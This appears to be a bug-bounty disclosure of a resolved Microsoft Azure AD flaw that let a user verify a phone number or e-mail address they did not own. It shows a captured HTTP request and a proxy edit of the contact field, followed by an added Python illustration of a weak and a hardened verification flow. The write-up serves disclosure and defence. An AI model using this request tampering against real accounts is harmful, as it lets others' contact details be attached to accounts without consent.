Microsoft Authentication Bypass Vulnerability
Greetings,
Summary
The vulnerability allows you to confirm a phone number or e-mail address whether you own it or not, so you have bypassed the two-factor authentication verification. Two-step verification must be active for the leak to occur, and the 2FA verification must be made mandatory by the administrator. You can add the phone number or e-mail address to a corporate e-mail account without its owner knowing. This is very significant in terms of computer forensics: a criminal offense may appear attached to your e-mail address, as confirmed by your phone, so you can end up in a criminal position. Think of your phone number having been approved on WannaCry's e-mail address. Hello FBI, it's not me, it's a 0day 🙂
Steps To Reproduce
Step 1:
The administrator must have enabled two-factor authentication and require you to add a phone number to your account when logging in.
Step 2:
I tried it first through the phone number. When I realized that, I went on with the e-mail address.
Step 3:
Let us examine the outgoing request when we press the verification button:
POST /passwordreset/SendEmail.ajax HTTP/1.1
Host: account.activedirectory.windowsazure.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
X-Requested-With: XMLHttpRequest
AjaxSessionKey: null
__RequestVerificationToken: xkbu4lBzTLi4syPavllsrfnvFxXgEWQIGC1sadasdaxxHuzbcu01
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Referer: https://account.activedirectory.windowsazure.com/passwordreset/register.aspx?client-request-id=x&sspr=1
Content-Length: 455
Cookie: flt=0; BOX.SessionCacheKey.SessID=cac246d0-xxxx-4bb5-879c-9xxxxe5ba1; BOX.SessionCacheKey.sspr-reg-ru=https://login.microsoftonline.com/common/SAS/ProcessAuth?request=rxxxxG5dO028RI59EjuJL3VO43C; BOX.CacheKey.CachedCSSFiles=1.0.0.1960:0xxxxxxFEDxx40xDB475A4C0x9B3Fxxxx2487
DNT: 1
Connection: close

p0=%7B%22UserCompanyName%22%3A%22Lostar%22%2C%22MobileCountryCode%22%3A%2290%22%2C%22MobileCountryCodeIndex%22%3A213%2C%22MobilePhoneNumber%22%3A%22x%22%2C%22AltEmail%22%3A%22berk.imran7%40gmail.com%22%2C%22RegistrationAttribute%22%3A%22AlternateEmailAttribute%22%2C%22MobilePhoneValidationOptionKey%22%3A%22%22%7D&assembly=BOX.AzurePortalWebsite, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null&class=Microsoft.Online.BOX.Admin.UI.Register
When I examine the outgoing POST request and URL-decode it:
p0={"UserCompanyName":"Lostar","MobileCountryCode":"90","MobileCountryCodeIndex":213,"MobilePhoneNumber":"{Phone number}","AltEmail":"[email protected]","RegistrationAttribute":"AlternateEmailAttribute","MobilePhoneValidationOptionKey":""}&assembly=BOX.AzurePortalWebsite, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null&class=Microsoft.Online.BOX.Admin.UI.Register
All you need to do is change the phone number or e-mail address with the proxy, namely:
p0={"UserCompanyName":"Lostar","MobileCountryCode":"90","MobileCountryCodeIndex":213,"MobilePhoneNumber":"{Phone number}","AltEmail":"[email protected]","RegistrationAttribute":"AlternateEmailAttribute","MobilePhoneValidationOptionKey":""}&assembly=BOX.AzurePortalWebsite, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null&class=Microsoft.Online.BOX.Admin.UI.Register
Step 4:
Got e-mail.
Step 5:
Boom!
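The root cause in the flow above is that the contact to be registered (AltEmail or MobilePhoneNumber) is supplied by the client on every request, so a code delivered to one address can be used to confirm a different one simply by editing the later request in a proxy. As an added example that is not from the original write-up and is not Microsoft's code, the Python below models that weak pattern beside a hardened one: the server records which contact a code was issued for, keys the stored challenge to that contact, and ignores any resubmitted contact value at confirmation time. The class and method names, the in-memory store, the session id, the code lifetime and the sample addresses are assumptions constructed for this illustration.

```python
import hashlib
import hmac
import secrets
import time
from typing import Dict, Optional, Tuple

CODE_TTL_SECONDS = 600  # assumed lifetime of a verification code


def normalize(contact: str) -> str:
    """Canonical form of an e-mail address or phone number for comparison."""
    return contact.strip().lower()


class WeakRegistration:
    """Pattern the write-up describes: a code goes out to the contact named in
    the send request, but the confirm step trusts the contact value the client
    resubmits, so the two need not match."""

    def __init__(self) -> None:
        self.pending: Dict[str, str] = {}     # session -> code that was sent
        self.registered: Dict[str, str] = {}  # session -> contact recorded as verified

    def send_code(self, session: str, contact: str) -> str:
        code = f"{secrets.randbelow(10**6):06d}"
        self.pending[session] = code
        return code  # would be e-mailed/SMSed to `contact`; returned here for the demo

    def confirm(self, session: str, contact: str, code: str) -> bool:
        # DEFECT: `contact` is whatever the client sends now, not the address
        # the code was actually delivered to.
        if self.pending.get(session) == code:
            self.registered[session] = normalize(contact)
            return True
        return False


class HardenedRegistration:
    """Server records which contact a code was issued for and keys the stored
    challenge to it; the confirm step ignores any client-supplied contact."""

    def __init__(self, server_key: Optional[bytes] = None) -> None:
        self.key = server_key or secrets.token_bytes(32)
        self.pending: Dict[str, Tuple[str, bytes, float]] = {}  # session -> (contact, tag, expires_at)
        self.registered: Dict[str, str] = {}

    def _tag(self, session: str, contact: str, code: str) -> bytes:
        msg = f"{session}|{contact}|{code}".encode()
        return hmac.new(self.key, msg, hashlib.sha256).digest()

    def send_code(self, session: str, contact: str) -> str:
        contact = normalize(contact)
        code = f"{secrets.randbelow(10**6):06d}"
        # Store a keyed hash over (session, contact, code), never the bare code,
        # so the stored challenge is bound to exactly this contact.
        self.pending[session] = (contact, self._tag(session, contact, code),
                                 time.time() + CODE_TTL_SECONDS)
        return code

    def confirm(self, session: str, code: str,
                contact_from_client: Optional[str] = None) -> bool:
        entry = self.pending.get(session)
        if entry is None:
            return False
        contact, tag, expires_at = entry
        if time.time() > expires_at:
            del self.pending[session]
            return False
        if not hmac.compare_digest(tag, self._tag(session, contact, code)):
            return False  # wrong code; challenge stays pending for retry/lockout logic
        # contact_from_client is deliberately unused: only the server-recorded
        # contact can become the registered one.
        self.registered[session] = contact
        del self.pending[session]  # single use
        return True


def demo() -> Tuple[str, str]:
    """Run both flows with the same 'edit the address in the proxy' step, using
    constructed sample addresses, and return what each ended up registering."""
    weak = WeakRegistration()
    code = weak.send_code("sess-1", "owned@example.com")
    weak.confirm("sess-1", "never-verified@example.com", code)

    hard = HardenedRegistration()
    code = hard.send_code("sess-1", "owned@example.com")
    hard.confirm("sess-1", code, contact_from_client="never-verified@example.com")

    return weak.registered["sess-1"], hard.registered["sess-1"]


if __name__ == "__main__":
    print(demo())
```

Running demo() shows the weak flow registering the resubmitted, never-verified address while the hardened flow registers only the address the code was delivered to. The same binding applies to a phone number: whichever attribute the send step targets is the only value the confirm step may record.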
Proof of Concept
Timeline
October 10: Report Submitted
October 16: Report reviewed
October 18 – 21: Discussion
November 17: Report closed as resolved
Final: Award and hall of fame.
Thanks
Best Regards
Berk İmran